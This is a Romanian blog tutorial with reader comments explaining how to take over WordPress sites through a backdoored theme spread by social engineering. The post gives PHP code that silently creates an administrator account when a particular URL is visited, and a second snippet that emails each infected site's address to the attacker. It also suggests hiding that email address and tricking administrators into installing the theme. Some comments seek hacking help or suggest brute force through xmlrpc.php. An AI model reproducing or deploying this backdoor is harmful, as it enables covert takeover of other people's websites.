26.7.13

Spargerea unui blog Wordpress cu ajutorul Ingineriei Sociale

Sună foarte frumos şi defapt este foarte uşor. Tutorialul ce l-am creat astăzi pentru voi nu este o idee proprie. M-am inspirat din ceva ce am citit acum foarte mult timp, un scenariu foarte bine pus la punct legat de WordPress şi anume, cum putem să luăm acces la un blog cu eleganţă şi fără a lăsa urme ca să îşi dea seama proprietarul.

Să dăm un mic exemplu. Domnul Gheorghe vrea să spargă cât mai multe blog-uri de pe o anumită nişă web. Se gândeşte cum să facă un lucru de genul ăsta. Noroc că Gheorghe este foarte inventiv şi i-a venit în minte să creeze şi să "infecteze" o temă (theme) visuală.

Mulţi o să spuneţi că o să creeze un Remote Code / Command Execution (RCE). Dar nu. Pentru că ar lăsa urme. Aşa că va adăuga în temă un cod PHP care să adauge automat un nou cont cu drepturi de administrator.

add_action('wp_head', 'wp_wordpress');
      function wp_wordpress() {
                    if ($_GET['p'] == '1') {
                           require('wp-includes/registration.php');
                    if (!username_exists('wordpress')) {
      $user_id = wp_create_user('Guest', 'password');
      $user = new WP_User($user_id);
      $user->set_role('administrator');
        }
    }
} 
Ce face codul de mai sus? Dacă este adăugat spre exemplu în templates.php (am precizat această filă deoarece este executată automat când accesăm index-ul unui blog), oricine va intra pe următorul link: http://pentesting/wp/?p=1 (primul articol de pe blog) va crea în baza de date un nou cont cu drepturi de administrator şi cu numele: Guest şi parola password. O remarcă importantă ar fi aceea că tema instalată trebuie să fie şi cea activă.

Legat de ingineria socială vă descurcaţi voi că sunteţi baieţi isteţi cu mult timp liber. Puteţi posta online undeva tema şi să adaugaţi undeva anumite cuvinte pentru a crea un dork să puteţi găsi blog-urile infectate. Sau îl puteţi manipula chiar pe administrator să instaleze tema.

Ok. Ca să fie totul complet şi pentru că nu am fost mulţumit parcă dacă nu ajutam şi cu partea asta, adică cea în care sunteţi informaţi cu ce blog a fost infectat, pe email.

<? add_action('wp_head','wp_wordpressmail');
           function wp_wordpressmail(){
                     if ( is_user_logged_in() ) {
                     if(!username_exists('wordpress')){
     $addr='TinKode@domain.tld'; # Aici puneţi adresa voastră de email
     $judul='WP URL';
                   wp_mail($addr,$judul,get_bloginfo('wpurl'));
        }
     }
  }
?> 

Să vă bucuraţi de metodă. Şi ca să nu vă dea de gol adresa de mail, puteţi să o encriptaţi în base64.

Să nu uitaţi să stergeţi tag-urile PHP când adăugaţi în filă.

THE END

Share on:

43 comments:

  1. Mulțumiri din partea muritorilor de rând!

    ReplyDelete
  2. TinKode,ce sistem de operare foloseai cand spargeai servere?

    ReplyDelete
    Replies
    1. In general toti hackerii folosesc Linux.

      Delete
    2. Habar nu aveti cate se pot face de pe un simplu sistem de operare cum este windows.

      La linux treci cand ai de lucru in bash si alte cele ..

      Delete
    3. Habar nu aveti cate se pot face de pe windows , linux iti trebuie daca ai treaba in Bash sau altceva, desi exista foarte multe alternative si pe windows , nu mai zic de faptul ca daca nu ai ca target servere web , windows-ul este cel mai folosit in ziua de azi pentru accesare mail, cpanel , whm etc ...

      iar despre securizare web , am vazut mai sus ca intreba cineva , ar trebuii mai intai ca sa invete programare sa stie ce face codul si cum ruleaza .

      Delete
    4. Probabil Back Track (o distributie Linux cu tot felul de tool-uri folosite pentru hacking).

      Delete
  3. beni zoldos :))) LINUX PRIETENE.

    ReplyDelete
  4. "encriptaţi în base64" - hacker language?! :)

    ReplyDelete
  5. TinKode ai un id de mess sau gmail ? vreau sa-ti propun ceva

    ReplyDelete
  6. Cu asta poti fura steam-uri oare :))? Daca formez o pagina php personalizata si pune botu si se logheaza oare ar merge ce zici :> ?

    ReplyDelete
    Replies
    1. Asta se face mult mai simplu in 2021 :) ce zici aici e un simplu phisihig. Manipulezi DOM-ul in asa fel incat sa primesti informatiile din input-urile completate pe o adresa de mail de ex.

      Delete
  7. Asa cum a spus intr-un interviu d ela proTV foloseste sistem d eoperare Linus sau Win7... bafta in continuare si incepe sami placa chestile astea cum ai facut Tinkode o sa incerc si eu ceva ...

    ReplyDelete
  8. salut,cum pot lua legatura cu tine?
    o adresa de mail ceva?

    ReplyDelete
  9. Cum pot lua legatura cu tine? un email ceva?

    ReplyDelete
  10. ce programe imi trebuie pentru a face asta? si..cum adica? am programul respectiv si fac o tema(fundal) de blog care are un fel de virusi si eu ii pot ,,infecta'' blogul?? pls help me TINKODE !!

    ReplyDelete
    Replies
    1. un exista programe pt a face asta! iti trebuie cunostinte de PHP si un pic de web design. crezi k cu un click si un generator ai sa spargi siteuri? lol

      Delete
  11. Se foloseste de asazisul keylogger , o metoda clasica si eficienta.. dar windows 7 contine windows defender care il gaseste dupa o scanare completa a sistemului ...

    ReplyDelete
    Replies
    1. ce keyloger ma? lol voi kiar vreti sa vi sa raspunda la intrebarile astea stupide? stii ce e un keyloger?,ai creat vreodata unu?stii vreun limbaj d programmare?tolti vreti sa deveniti hakeri dar unici unu nu stie un pic de c++,PHP,java etc look noobs.

      Delete
  12. Prietene, daca vrei sa spargi site-uri prin inginerie sociala si nu esti in stare sa urmezi niste instructiuni foarte simplu e timpul sa iti iei calculatorul, sa-l duci in padure, sa-i dai foc, sa stergi urmele si sa te duci inapoi acasa.

    ReplyDelete
  13. Un prograam de pentesting foarte bun...Kali linux sau Backtrack5 R3 recomand Kali linux pentru cei care au habar ;)

    ReplyDelete
  14. In ce program scriptezi ? Adica in ce program scri chestile astea

    ReplyDelete
  15. Multumim TinKode , chiar aveam nevoie de un tutorial de genu:) , bafta frate:* si daca mai ai timp nu ne ar deranja sa mai postezi cate ceva:D:D:D

    ReplyDelete
  16. NATIUNE DE RAHAT !
    In loc sa invatati ceva util care sa deserveasca societatii si sa contribuiti la prosperitatea acesteia, lasand intiparit numele vostru acolo undeva, mandrindu-se de acesta, parintii, fratii, nepotii sau copii vostri, va ocupati de cel mai josnic mod de a viola proprietatea privata. RUSINE !!!

    ReplyDelete
    Replies
    1. Prietene ... tu vezi de salvarea societății de Rosia Montana etc. și lasă-ne pe noi sa facem ce știm mai bine ... ca iți garantez ca dam mai mult ajutor societății in 2 min si 10 click decât ar putea oferii 1 mil. de al de tine in 5-10 ani. P.S. Te anunț ca "opțiunea'' Anonymous pe care ai ales-o nu iti protejează total identitatea asa ca ai mare atenție la ce mai zici pe aici si pe cine mai critici sunt sigur ca unii abia așteaptă sa te lase o perioada fără net -_-

      Delete
  17. Ba frate lasa`te dute arunca`te in balta ca e cel mai usor si mai simplu fa drq un keylogger si ai terminat wow... mare cacat ce faci tu aici o.O si asa vezi chiar tot ce face toate conturile te chinui asa faci pur si simplu keylogger si ii zici ca e nush ce... :| te complici atat , o.O lasa`te.

    ReplyDelete
  18. De unde ai reusit sa inveti toate astea ?

    ReplyDelete
  19. nu pot sa intru pe link .... help :D

    ReplyDelete
  20. Ca tine vreau sa fiu cand o sa fiu mare !

    ReplyDelete
  21. Ma oameni buni credeti ca numai asta este singura metoda de a "sparge" un site pe Wordpress? :)) da este una din multiplele metode. Mai exista si BruteForce...mda..unii o sa spuneti ca dureaza prea mult insa este destul de eficienta si nu lasa urme mai ales daca folosesti OS bazat pe Linux (nu dau exemplu de distributii pentru ca stiti deja). Asa ca mai ganditi-va si la alte metode nu numai la cea prezentata :)))) :))

    ReplyDelete
    Replies
    1. Crede-ma ... lasa urme ... exista posibilitatea de a stoca IP-ul fiecarei persoane care incearca sa se logheze. Pe langa asta, e foarte simplu sa limitezi numarul de incercari de logare pe ora/zi, whatever, ceea ce face ca BruteForce-ul sa nu mai fie practic deloc...mai ales daca are o parola mai complexa decat 123456

      Delete
    2. Perfect de acord că se salvează în loguri orice încercare a unuia ce face bruteforce. Dar dacă ne limităm la WordPress sau ceva similar, acea restricţie este egală cu 0 dacă te foloseşti să faci bruteforce prin XMLRPC.php, unde nu există vreo restricţie.

      Delete
  22. au auzit si romanii de kali linux :))

    ReplyDelete
  23. anon vorbesti de parca ai fii mare hacker tu......!nu te mai da ce nu esti.

    ReplyDelete
    Replies
    1. Nu sunt Hacker...nu ma consider unul ci doar am zis ca exista si alte metode de a sparge un site pe wordpress.... Keep KALM and love linux :P

      Delete
  24. cum pot sa shimb datele unui site?

    ReplyDelete
  25. ...care urme sa le stearga? /var/log/secure.forest???:))

    ReplyDelete
  26. salut am o intrebare cum pot scoate comentariile de pe un blog wordpress fara user si fara parola nu injurati recunosc nu ma pricep la treburile astea cu php html si ce mai vorbeati voi mai sus dar am pe cineva care ma mananca de cu.....r pe un blog wordpress si vreau sa scot acele comentarii sau sa sterg blogul detot se poate face ceva fara user si parola

    ReplyDelete
  27. Since it is easy to setup and easy to use, it is possible to create static HTML files that are based on the dynamic WordPress blog. This cache plugin also automatically modifies the.htaccess file along with offering a cache timeout feature.tentų gamyba

    ReplyDelete